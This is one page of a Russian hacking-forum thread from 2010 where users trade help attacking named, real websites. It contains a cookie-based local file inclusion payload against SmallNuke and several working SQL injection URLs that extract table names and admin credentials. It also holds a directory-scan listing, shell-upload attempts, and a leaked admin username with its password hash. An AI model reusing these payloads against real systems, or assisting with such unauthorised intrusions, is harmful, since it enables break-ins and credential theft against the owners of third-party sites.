Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
Page 682 of 1207
  1. BlackFan

    BlackFan Member

    Joined:
    3 Jan 2009
    Messages:
    47
    Likes Received:
    40
    Reputations:
    32
    Нашел LFI в SmallNuke

    common.php
    PHP:
       if ((!isset ($_SESSION['snss_lang'])) AND (isset($_COOKIE['snss_lang']))) {
              session_register ("snss_lang");
              $_SESSION['snss_lang'] = $conf['default_lang'];
          if (    $_COOKIE['snss_lang'] != "") {
                 $_SESSION['snss_lang'] = $_COOKIE['snss_lang'];
          } else {
                 $_SESSION['snss_lang'] = $conf['default_lang'];
          }
       }
           define ('_SNSS_LANG',''.$_SESSION['snss_lang'].'');
    index.php
    PHP:
    include (SN_PathRoot.'inc/common.php');

    if (    file_exists (SN_PathRoot.'lang/lang-'._SNSS_LANG.'.php')) {
       include_once (    SN_PathRoot.'lang/lang-'._SNSS_LANG.'.php');
    } else {
           eror ("Eror! Lang file is absent");
       exit;
    }
    У себя тестировал, например, куки snss_lang = /../../robots.txt%00 отлично инключится.

    Пробую на реальном сайте (http://www.bifilife.ru/index.php)
    ru.php%00 и en.php%00 работают, а вот за пределы lang никак не получается вылезти.
    Что именно не так делаю?) (пробовал на нескольких)
     
    #13621 BlackFan, 16 Jun 2010
  2. manerus

    manerus New Member

    Joined:
    10 Aug 2009
    Messages:
    27
    Likes Received:
    2
    Reputations:
    1
    помогите подобрать таблицы не как не могу найти даже с помощью SQLIHelperV.2.7 не чего не находит(
    версия 4.1.22-standard
    сразу скажу что это шоп.
    пробовал подбирать в ручную но тчетно.

    могу в пм кинуть линк кто сможет мне объеснить!
     
    #13622 manerus, 16 Jun 2010
  3. wildshaman

    wildshaman Elder - Старейшина

    Joined:
    16 Apr 2008
    Messages:
    477
    Likes Received:
    483
    Reputations:
    99
    В четвертой версии таблицы только брутить.
    SIPT умеет, Toolza тоже умеет.
     
    #13623 wildshaman, 16 Jun 2010
  4. jecka3000

    jecka3000 Elder - Старейшина

    Joined:
    15 Mar 2008
    Messages:
    360
    Likes Received:
    54
    Reputations:
    4
    помогите найти админку _http://www.aaptnet.org/home/
     
    #13624 jecka3000, 16 Jun 2010
  5. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,251
    Likes Received:
    1,148
    Reputations:
    886
    http://www.aaptnet.org/cms/
    http://www.aaptnet.org/members/

    (403) ((
     
    _________________________
    #13625 Konqi, 16 Jun 2010
    Last edited: 16 Jun 2010
  6. Gorev

    Gorev Level 8

    Joined:
    31 Mar 2006
    Messages:
    2,551
    Likes Received:
    1,259
    Reputations:
    274

    http://aaptnet.org/.htaccess 403 Forbidden
    http://aaptnet.org/.htconfig 403 Forbidden
    http://aaptnet.org/.htpasswd 403 Forbidden
    http://aaptnet.org/education 301 Moved Permanently
    http://aaptnet.org/cgi.cgi 403 Forbidden
    http://aaptnet.org/cms 301 Moved Permanently
    http://aaptnet.org/css 301 Moved Permanently
    http://aaptnet.org/favicon.ico HTTP 200 OK
    http://aaptnet.org/img 301 Moved Permanently
    http://aaptnet.org/index.php 302 Found
    http://aaptnet.org/index.py 403 Forbidden
    http://aaptnet.org/login.php 401 Internal Server Error
    http://aaptnet.org/manager 301 Moved Permanently
    http://aaptnet.org/news 301 Moved Permanently
    http://aaptnet.org/picture_library 301 Moved Permanently
    http://aaptnet.org/quikstore.cgi 403 Forbidden
    http://aaptnet.org/resources 301 Moved Permanently
    http://aaptnet.org/test 301 Moved Permanently
    http://aaptnet.org/web_store.cgi 403 Forbidden
    http://aaptnet.org/home 301 Moved Permanently
    http://aaptnet.org/members 301 Moved Permanently
    http://aaptnet.org/server-status 403 Forbidden
    http://aaptnet.org/.htaccess~ 403 Forbidden
    http://aaptnet.org/.htpasswd~ 403 Forbidden
     
    #13626 Gorev, 16 Jun 2010
  7. jecka3000

    jecka3000 Elder - Старейшина

    Joined:
    15 Mar 2008
    Messages:
    360
    Likes Received:
    54
    Reputations:
    4
    пробую залить шелл http://www.pogoda.ua/index.php?id=-4+union+select+1,file_priv,3,4,5+from+mysql.user--
    ничего не получается, есть поле users c test;test, http://www.pogoda.ua/admin тож ничего не происходит...есть вообще какие варианты попасть в админку или залить шелл?)
     
    #13627 jecka3000, 16 Jun 2010
  8. durito

    durito Elder - Старейшина

    Joined:
    6 Jun 2008
    Messages:
    125
    Likes Received:
    24
    Reputations:
    27
    хитромудрая скуль и походу тут не mysql

    http://www.collegedates.com/selectschool/?section=signup&schoolid=731+and+1=1&sid=

    помогите с советом
     
    #13628 durito, 16 Jun 2010
  9. wildshaman

    wildshaman Elder - Старейшина

    Joined:
    16 Apr 2008
    Messages:
    477
    Likes Received:
    483
    Reputations:
    99
    Обычная скуля, 4 колонки, без вывода
    http://www.collegedates.com/selectschool/?section=signup&schoolid=731+union+select+111,222,333,444+--+&sid=
     
    #13629 wildshaman, 16 Jun 2010
  10. .Slip

    .Slip Elder - Старейшина

    Joined:
    16 Jan 2006
    Messages:
    1,571
    Likes Received:
    977
    Reputations:
    783
    mysql 5й ветки, слепая инъекция.

    >> помогите советом
    Советую почитать статьи.
     
    #13630 .Slip, 16 Jun 2010
  11. Tigger

    Tigger Elder - Старейшина

    Joined:
    27 Aug 2007
    Messages:
    936
    Likes Received:
    527
    Reputations:
    204

    http://www.collegedates.com/selectschool/?section=signup&schoolid=731+union+select+1,2,3,4--+

    Как бы там blind
     
    #13631 Tigger, 16 Jun 2010
  12. manerus

    manerus New Member

    Joined:
    10 Aug 2009
    Messages:
    27
    Likes Received:
    2
    Reputations:
    1
    к сожелению он тоже не помог((
     
    #13632 manerus, 16 Jun 2010
  13. v1d0qz

    v1d0qz Elder - Старейшина

    Joined:
    21 Jul 2007
    Messages:
    67
    Likes Received:
    90
    Reputations:
    52
    Делаем несколько магических движений, а потом "ТУПО" заламываемся в админку без пароля http://www.collegedates.com/admin/
     
    #13633 v1d0qz, 16 Jun 2010
    2 people like this.
  14. pinch

    pinch Elder - Старейшина

    Joined:
    13 Dec 2009
    Messages:
    417
    Likes Received:
    46
    Reputations:
    40
    http://www.collegedates.com/selectschool/?section=signup&schoolid=99999+union+select+1,2,table_name,4+from+information_schema.tables+limit+15,1--

    где тут blind емае
     
    #13634 pinch, 16 Jun 2010
    1 person likes this.
  15. Gorev

    Gorev Level 8

    Joined:
    31 Mar 2006
    Messages:
    2,551
    Likes Received:
    1,259
    Reputations:
    274
    http://www.infotula.ru/forum/ прошу помочь определить движок форума...
     
    #13635 Gorev, 16 Jun 2010
  16. manerus

    manerus New Member

    Joined:
    10 Aug 2009
    Messages:
    27
    Likes Received:
    2
    Reputations:
    1
    вроде самописный
     
    #13636 manerus, 16 Jun 2010
  17. Op3r

    Op3r New Member

    Joined:
    10 Dec 2007
    Messages:
    11
    Likes Received:
    0
    Reputations:
    0
    посоветуйте как вывести данные по следующим колонкам id, name, password
    _http://www.oasisoftheseas.com/viewRelease.php?id=-25+union+select+column_name,2+from+INFORMATION_SCHEMA.COLUMNS+where+table_name=0x41444D494E5553455253+limit+0,4--
     
    #13637 Op3r, 16 Jun 2010
  18. Gorev

    Gorev Level 8

    Joined:
    31 Mar 2006
    Messages:
    2,551
    Likes Received:
    1,259
    Reputations:
    274
    442393_oasisoftheseas_data.adminUsers
    zach:*7BBC795B807CB505967BF8A5CEFF0945E8897D6A
     
    #13638 Gorev, 16 Jun 2010
    Last edited: 16 Jun 2010
    2 people like this.
  19. Op3r

    Op3r New Member

    Joined:
    10 Dec 2007
    Messages:
    11
    Likes Received:
    0
    Reputations:
    0
    Gorev с этого момента поподробнее, с помощью какого запроса Вы получили данные?
     
    #13639 Op3r, 16 Jun 2010
  20. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,251
    Likes Received:
    1,148
    Reputations:
    886
    http://www.oasisoftheseas.com/viewRelease.php?id=-25+union+select+password,2+from+442393_oasisoftheseas_data.adminUsers

    :)
     
    _________________________
    #13640 Konqi, 16 Jun 2010
    1 person likes this.
(You must log in or sign up to post here.)
Page 682 of 1207
Thread Status:
Not open for further replies.
Language
English (US)
    ANTICHAT ™ © 2001-2027 Antichat Kft.